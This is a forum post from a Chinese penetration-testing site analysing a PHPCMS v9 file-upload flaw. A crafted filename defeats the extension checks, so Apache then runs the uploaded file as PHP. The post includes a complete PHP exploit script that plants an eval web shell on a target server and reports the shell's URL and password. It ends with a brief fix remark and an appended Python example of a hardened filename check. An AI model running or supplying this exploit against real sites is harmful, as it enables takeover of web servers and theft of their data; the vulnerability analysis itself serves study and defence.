中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: PHPCMS v9 Getshell
Author: admin
Date: 2013-3-7 13:06
Vulnerability type: file upload leading to arbitrary code execution

Brief description:
phpcms v9 getshell (apache)

Detailed description:

Vulnerable file: phpcms\modules\attachment\attachments.php
    public function crop_upload() {
        if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {
            $pic = $GLOBALS["HTTP_RAW_POST_DATA"];
            if (isset($_GET['width']) && !empty($_GET['width'])) {
                $width = intval($_GET['width']);
            }
            if (isset($_GET['height']) && !empty($_GET['height'])) {
                $height = intval($_GET['height']);
            }
            if (isset($_GET['file']) && !empty($_GET['file'])) {
                $_GET['file'] = str_replace(';','',$_GET['file']); // semicolons are stripped
                if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit(); // the is_image() check is the key point
                if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {
                    $file = $_GET['file'];
                    $basename = basename($file); // file name including its extension
                    if (strpos($basename, 'thumb_')!==false) {
                        $file_arr = explode('_', $basename);
                        $basename = array_pop($file_arr);
                    }
                    $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;
                } else {
                    pc_base::load_sys_class('attachment','',0);
                    $module = trim($_GET['module']);
                    $catid = intval($_GET['catid']);
                    $siteid = $this->get_siteid();
                    $attachment = new attachment($module, $catid, $siteid);
                    $uploadedfile['filename'] = basename($_GET['file']);
                    $uploadedfile['fileext'] = fileext($_GET['file']);
                    if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {
                        $uploadedfile['isimage'] = 1;
                    }
                    $file_path = $this->upload_path.date('Y/md/');
                    pc_base::load_sys_func('dir');
                    dir_create($file_path);
                    $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];
                    $uploadedfile['filepath'] = date('Y/md/').$new_file;
                    $aid = $attachment->add($uploadedfile);
                }
                $filepath = date('Y/md/');
                file_put_contents($this->upload_path.$filepath.$new_file, $pic); // the file name is attacker-controlled, and so is $pic
            } else {
                return false;
            }
            echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;
            exit;
        }
    }

Extension check: phpcms\modules\attachment\functions\global.func.php

    function is_image($file) {
        $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff');
        $ext = fileext($file); // the key spot
        return in_array($ext,$ext_arr) ? $ext_arr :false;
    }

Key function:

    function fileext($filename) {
        return strtolower(trim(substr(strrchr($filename, '.'), 1, 10)));
    }
The fileext() function extracts the file extension: it takes at most 10 characters after the last '.', trims them and lower-cases the result.

Given this function, if we upload a file named ddd.Php.jpg%20%20%20%20%20%20%20Php,

the extension it extracts is still jpg: once PHP has decoded the %20 sequences to spaces, "jpg" plus the seven spaces fills the 10-character window, the trailing "Php" is cut off and trim() removes the spaces, so the extension check in is_image() is bypassed.

Back in crop_upload():

    if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();

After the is_image() check comes a second check for '.php', which the programmer implemented with strpos(). strpos() is case-sensitive, so '.Php' bypasses it directly.

After both layers of filtering above, our ddd.Php.jpg%20%20%20%20%20%20%20Php name is still accepted.

So $basename ends up as ddd.Php.jpg%20%20%20%20%20%20%20Php (with the %20s decoded to spaces), and file_put_contents() writes the file into the target directory.

Looking at the ddd.Php.jpg%20%20%20%20%20%20%20Php suffix, it should be clear to everyone: on a server running Apache, this file is parsed as PHP.

Proof of concept:

exp:

    <?php
    error_reporting(E_ERROR);
    set_time_limit(0);
    $pass="ln";
    print_r('
    +---------------------------------------------------------------------------+
    PHPCms V9 GETSHELL 0DAY
    code by L.N.

    apache 适用(利用的apache的解析漏洞) // 云安全
    www.yunsec.net
    +---------------------------------------------------------------------------+
    ');
    if ($argc < 2) {
        print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' url path

    Example:
    1.php '.$argv[0].' lanu.sinaapp.com
    2.php '.$argv[0].' lanu.sinaapp.com /phpcms
    +---------------------------------------------------------------------------+
    ');
        exit;
    }

    $url = $argv[1];
    $path = $argv[2];
    $phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
    $file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
    if($ret=Create_dir($url,$path))
    {
        //echo $ret;
        $pattern = "|Server:[^,]+?|U";
        preg_match_all($pattern, $ret, $matches);
        if($matches[0][0])
        {
            if(strpos($matches[0][0],'Apache') == false)
            {
                echo "\n亲!此网站不是apache的网站。\n";exit;
            }
        }
        $ret = GetShell($url,$phpshell,$path,$file);
        $pattern = "|http:\/\/[^,]+?\.,?|U";
        preg_match_all($pattern, $ret, $matches);
        if($matches[0][0])
        {
            echo "\n".'密码为: '.$pass."\n";
            echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
        }
        else
        {
            $pattern = "|\/uploadfile\/[^,]+?\.,?|U";
            preg_match_all($pattern, $ret, $matches);
            if($matches[0][0])
            {
                echo "\n".'密码为: '.$pass."\n";
                echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
            }
            else
            {
                echo "\r\n没得到!\n";exit;
            }
        }
    }

    function GetShell($url,$shell,$path,$js)
    {
        $content =$shell;
        $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
        $data .= "Host: ".$url."\r\n";
        $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
        $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        $data .= "Connection: close\r\n";
        $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
        $data .= $content."\r\n";
        $ock=fsockopen($url,80);
        if (!$ock)
        {
            echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
        }
        else
        {
            fwrite($ock,$data);
            $resp = '';
            while (!feof($ock))
            {
                $resp.=fread($ock, 1024);
            }
            return $resp;
        }
    }

    function Create_dir($url,$path='')
    {
        $content ='I love you';
        $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
        $data .= "Host: ".$url."\r\n";
        $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
        $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        $data .= "Connection: close\r\n";
        $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
        $data .= $content."\r\n";
        $ock=fsockopen($url,80);
        if (!$ock)
        {
            echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
        }
        fwrite($ock,$data);
        $resp = '';
        while (!feof($ock))
        {
            $resp.=fread($ock, 1024);
        }
        return $resp;
    }
    ?>

Fix:

Filter, filter, and filter again.
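To make the bypass analysed above and the fix concrete, here is an added example (not PHPCMS code and not from the post): a Python port of fileext(), the is_image() whitelist and the case-sensitive '.php' search, beside a hardened check that validates the whole decoded basename against one strict pattern. The function names, the SAFE_IMAGE_NAME pattern and the sample inputs are my own; the crafted name is the one from the write-up.

```python
import re
from urllib.parse import unquote

# Added example, not PHPCMS code: a port of the checks the page walks through,
# followed by a hardened check that rejects the crafted name.

IMAGE_EXTS = ("jpg", "gif", "png", "bmp", "jpeg", "tiff")   # is_image() whitelist
PHP_TRIM = " \t\n\r\0\x0b"                                   # characters PHP's trim() strips


def phpcms_fileext(filename: str) -> str:
    """Port of fileext(): up to 10 characters after the last '.', trimmed, lower-cased."""
    dot = filename.rfind(".")
    if dot == -1:
        return ""                      # strrchr() returned false -> substr() gives ""
    return filename[dot + 1:dot + 11].strip(PHP_TRIM).lower()


def phpcms_guard_accepts(file_param: str) -> bool:
    """The guard in crop_upload() as the page quotes it, applied to the raw ?file= value."""
    name = unquote(file_param).replace(";", "")      # PHP decodes $_GET; then the ';' filter
    if phpcms_fileext(name) not in IMAGE_EXTS:       # is_image()
        return False
    if ".php" in name:                               # strpos($_GET['file'], '.php') is case-sensitive
        return False
    return True


# Hardened rule (assumed policy): one base name, exactly one whitelisted extension,
# compared case-insensitively, with no whitespace, control characters or extra dots.
SAFE_IMAGE_NAME = re.compile(r"[a-z0-9_-]{1,64}\.(jpe?g|gif|png|bmp)")


def hardened_accepts(file_param: str) -> bool:
    """True only when the whole decoded basename matches the strict pattern."""
    base = unquote(file_param).rsplit("/", 1)[-1].lower()
    return SAFE_IMAGE_NAME.fullmatch(base) is not None


CRAFTED = "ddd.Php.jpg%20%20%20%20%20%20%20Php"   # the name from the write-up

if __name__ == "__main__":
    print("fileext ->", repr(phpcms_fileext(unquote(CRAFTED))))   # 'jpg': 'Php' falls outside the 10-char window
    print("original guard:", phpcms_guard_accepts(CRAFTED))       # True  (vulnerable)
    print("hardened guard:", hardened_accepts(CRAFTED))           # False (rejected)
```

With six spaces instead of seven the window keeps the 'P', so fileext() returns a non-whitelisted value; the seven-space form is what slips through, and the hardened check rejects both.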
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)